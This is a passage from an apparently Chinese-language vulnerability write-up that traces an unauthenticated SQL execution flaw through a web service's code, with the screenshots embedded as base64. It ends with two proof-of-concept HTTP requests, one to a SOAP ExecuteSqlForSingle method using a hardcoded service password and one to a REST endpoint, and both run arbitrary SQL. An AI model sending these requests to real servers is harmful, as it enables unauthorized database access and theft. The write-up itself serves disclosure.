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
<p blockindex=40>16、三个参数会进入GetExecuteSqlForStoreProcedure方法，跟进查看代码，发现也有if校验sql的值，无用：</p>
<p blockindex=41><img src="data:image/png;base64,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
<p blockindex=42>17、回到15步代码，sql参数再次传入ExecuteScalarSQL方法：</p>
<p blockindex=43><img src=data:image/png;base64,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
<p blockindex=44>18、而此方法正是 第9步的方法，开始步骤重合，后续分析同理，于是，第二个poc:</p>
<pre blockindex=45><code class="hljs language-js">POST /WebService/BasicService.asmx HTTP/<span class=hljs-number>1.1</span>
<span class=hljs-attr>Host</span>: 
Content-Type: text/xml; charset=utf-<span class=hljs-number>8</span>
Content-Length: length
<span class=hljs-attr>SOAPAction</span>: <span class=hljs-string>"http://tempuri.org/ExecuteSqlForSingle"</span>

&lt;?xml version=<span class=hljs-string>"1.0"</span> encoding=<span class=hljs-string>"utf-8"</span>?&gt;
<span class=xml><span class=hljs-tag>&lt;<span class=hljs-name>soap:Envelope</span> <span class=hljs-attr>xmlns:xsi</span>=<span class=hljs-string>"http://www.w3.org/2001/XMLSchema-instance"</span> <span class=hljs-attr>xmlns:xsd</span>=<span class=hljs-string>"http://www.w3.org/2001/XMLSchema"</span> <span class=hljs-attr>xmlns:soap</span>=<span class=hljs-string>"http://schemas.xmlsoap.org/soap/envelope/"</span>&gt;</span>
  <span class=hljs-tag>&lt;<span class=hljs-name>soap:Body</span>&gt;</span>
    <span class=hljs-tag>&lt;<span class=hljs-name>ExecuteSqlForSingle</span> <span class=hljs-attr>xmlns</span>=<span class=hljs-string>"http://tempuri.org/"</span>&gt;</span>
      <span class=hljs-tag>&lt;<span class=hljs-name>sql</span>&gt;</span>select @@version<span class=hljs-tag>&lt;/<span class=hljs-name>sql</span>&gt;</span>
      <span class=hljs-tag>&lt;<span class=hljs-name>strParameters</span>&gt;</span><span class=hljs-tag>&lt;/<span class=hljs-name>strParameters</span>&gt;</span>
      <span class=hljs-tag>&lt;<span class=hljs-name>webservicePassword</span>&gt;</span>{ac80457b-368d-4062-b2dd-ae4d490e1c4b}<span class=hljs-tag>&lt;/<span class=hljs-name>webservicePassword</span>&gt;</span>
    <span class=hljs-tag>&lt;/<span class=hljs-name>ExecuteSqlForSingle</span>&gt;</span>
  <span class=hljs-tag>&lt;/<span class=hljs-name>soap:Body</span>&gt;</span>
<span class=hljs-tag>&lt;/<span class=hljs-name>soap:Envelope</span>&gt;</span></span>
</code></pre>
<h2 blockindex=46>四、漏洞复现</h2>
<p blockindex=47>poc1:</p>
<pre blockindex=48><code class="hljs language-js">POST /api/system/ExecuteSqlForSingle HTTP/<span class=hljs-number>1.1</span>
<span class=hljs-attr>Host</span>: 
Content-Type: application/x-www-form-urlencoded

token=zxh&amp;sql=select @@version&amp;strParameters=
</code></pre>
<p blockindex=49><img src="data:image/png;base64,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